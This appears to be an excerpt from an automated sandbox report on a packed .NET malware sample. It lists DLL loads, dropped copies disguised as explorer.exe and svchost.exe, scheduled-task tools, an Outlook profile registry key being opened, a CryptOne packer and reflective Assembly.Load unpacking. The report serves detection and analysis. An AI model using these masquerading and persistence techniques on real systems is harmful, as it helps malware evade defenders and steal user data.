Source: C:\Windows\SysWOW64\at.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: msv1_0.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: ntlmshared.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: cryptdll.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: schedcli.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: msv1_0.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: ntlmshared.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: cryptdll.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: schedcli.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: msv1_0.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: ntlmshared.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: cryptdll.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: schedcli.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: msv1_0.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: ntlmshared.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: cryptdll.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: schedcli.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: msv1_0.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: ntlmshared.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: cryptdll.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: schedcli.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: msv1_0.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: ntlmshared.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: cryptdll.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: schedcli.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: msv1_0.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: ntlmshared.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: cryptdll.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: schedcli.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: msv1_0.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: ntlmshared.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: cryptdll.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: schedcli.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: msv1_0.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: ntlmshared.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: cryptdll.dll
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Section loaded: version.dll
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Section loaded: wldp.dll
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Section loaded: profapi.dll
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Section loaded: rasman.dll
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Section loaded: rtutils.dll
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Section loaded: secur32.dll
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Section loaded: schannel.dll
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: schedcli.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: msv1_0.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: ntlmshared.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: cryptdll.dll
Source: C:\Users\user\AppData\Roaming\dUENcAj.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\dUENcAj.exe	Section loaded: msvbvm60.dll
Source: C:\Users\user\AppData\Roaming\dUENcAj.exe	Section loaded: vb6zz.dll
Source: C:\Users\user\AppData\Roaming\dUENcAj.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\dUENcAj.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\dUENcAj.exe	Section loaded: sxs.dll
Source: C:\Users\user\AppData\Roaming\dUENcAj.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\dUENcAj.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\dUENcAj.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\dUENcAj.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\dUENcAj.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Section loaded: iconcodecservice.dll
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Section loaded: msvbvm60.dll
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Section loaded: vb6zz.dll
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Section loaded: sxs.dll
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Section loaded: sspicli.dll
Source: C:\Windows\System\explorer.exe	Section loaded: msvbvm60.dll
Source: C:\Windows\System\explorer.exe	Section loaded: vb6zz.dll
Source: C:\Windows\System\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System\explorer.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System\explorer.exe	Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Section loaded: cryptbase.dll

Source: C:\Users\user\Desktop\20250301_173245__P20250301_173245__P.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source:	Binary string: vznv.pdb source: 20250301_173245__p20250301_173245__p.exe , 00000001.00000000.1681689148.0000000000852000.00000002.00000001.01000000.00000006.sdmp, 20250301_173245__p20250301_173245__p.exe , 00000001.00000002.1777305488.0000000007347000.00000004.00000020.00020000.00000000.sdmp, 20250301_173245__P20250301_173245__P.exe, duencaj.exe .55.dr, dUENcAj.exe.1.dr, 20250301_173245__p20250301_173245__p.exe .0.dr
Source:	Binary string: vznv.pdbSHA256 source: 20250301_173245__p20250301_173245__p.exe , 00000001.00000000.1681689148.0000000000852000.00000002.00000001.01000000.00000006.sdmp, 20250301_173245__p20250301_173245__p.exe , 00000001.00000002.1777305488.0000000007347000.00000004.00000020.00020000.00000000.sdmp, 20250301_173245__P20250301_173245__P.exe, duencaj.exe .55.dr, dUENcAj.exe.1.dr, 20250301_173245__p20250301_173245__p.exe .0.dr

Data Obfuscation

Detected CryptOne packer

Source: C:\Windows\System\svchost.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{B196B287-BAB4-101A-B69C-00AA00341D07}\ProxyStubClsid32

.NET source code contains potential unpacker

Source: 1.2.20250301_173245__p20250301_173245__p.exe .7630000.3.raw.unpack, .cs	.Net Code: System.Reflection.Assembly.Load(byte[])
Source: 1.2.20250301_173245__p20250301_173245__p.exe .8cf0000.4.raw.unpack, HGH9Iq33EZG8dJvbWh.cs	.Net Code: AsPOcsXcDP System.Reflection.Assembly.Load(byte[])
Source: 1.2.20250301_173245__p20250301_173245__p.exe .2e1f404.0.raw.unpack, .cs	.Net Code: System.Reflection.Assembly.Load(byte[])

Source: 20250301_173245__p20250301_173245__p.exe .0.dr

Static PE information: 0xDA3F4693 [Fri Jan 11 09:32:03 2086 UTC]

Source: 20250301_173245__P20250301_173245__P.exe	Static PE information: section name: .tdata
Source: icsys.icn.exe.0.dr	Static PE information: section name: .tdata
Source: dUENcAj.exe.1.dr	Static PE information: section name: .tdata
Source: explorer.exe.2.dr	Static PE information: section name: .tdata
Source: spoolsv.exe.4.dr	Static PE information: section name: .tdata
Source: mrsys.exe.4.dr	Static PE information: section name: .tdata
Source: svchost.exe.5.dr	Static PE information: section name: .tdata
Source: stsys.exe.6.dr	Static PE information: section name: .tdata

Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Code function: 1_2_07481CEE push ds; retf	1_2_07481CEF
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Code function: 1_2_0BEF1ACD push FFFFFF8Bh; iretd	1_2_0BEF1ACF
Source: C:\Windows\System\svchost.exe	Code function: 6_2_0019CC18 push esp; iretd	6_2_0019CC19
Source: C:\Windows\System\svchost.exe	Code function: 6_2_0019D88C push eax; retf	6_2_0019D891
Source: C:\Windows\System\svchost.exe	Code function: 6_2_0019DE8C push esp; retf	6_2_0019DE8D
Source: C:\Windows\System\svchost.exe	Code function: 6_2_0019CCBC push esp; iretd	6_2_0019CCBD
Source: C:\Windows\System\svchost.exe	Code function: 6_2_0019CF64 push eax; iretd	6_2_0019CF65
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Code function: 46_2_02738926 pushad ; iretd	46_2_02738927
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Code function: 46_2_02738C37 pushfd ; iretd	46_2_02738C38
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Code function: 46_2_02738DE7 push esp; iretd	46_2_02738DE8
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 57_2_00F57CC0 push es; retf	57_2_00F57CC2
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 57_2_00F57CC3 push es; retf	57_2_00F57CCA
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 57_2_00F57C73 push es; retf	57_2_00F57C7A
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 57_2_00F57C6F push es; retf	57_2_00F57C72
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 57_2_02E81B97 push esp; retf	57_2_02E81BA2
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 57_2_02E81B6B push ecx; retf	57_2_02E81B72
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 57_2_02E81B65 push ecx; retf	57_2_02E81B6A
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 57_2_02E818F1 push eax; retf	57_2_02E818F2
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 57_2_02E819E9 push eax; retf	57_2_02E819EA
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 57_2_02E819EB push eax; retf	57_2_02E819F2
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 57_2_02E89C34 push ebp; retf	57_2_02E89BF8
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 57_2_02E81C01 push esp; retf	57_2_02E81C02
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 57_2_07071CEE push ds; retf	57_2_07071CEF
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 57_2_0BB70EC5 push FFFFFF8Bh; iretd	57_2_0BB70EC7
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 63_2_06C51669 push ss; retn 0006h	63_2_06C5166A
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 63_2_06C51581 push ss; retn 0006h	63_2_06C51582
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 63_2_06C50EB9 push cs; retn 0006h	63_2_06C50EBA
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 63_2_06C57A60 push ecx; retn 0006h	63_2_06C57A62
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 63_2_06C579E1 push eax; retn 0006h	63_2_06C579E2
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 63_2_06C5A9B3 push dword ptr [ecx+ecx-75h]; iretd	63_2_06C5A9BB
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 63_2_06DC890D push es; ret	63_2_06DC8920

Source: 20250301_173245__p20250301_173245__p.exe .0.dr	Static PE information: section name: .text entropy: 7.809745084930358
Source: duencaj.exe .55.dr	Static PE information: section name: .text entropy: 7.809745084930358

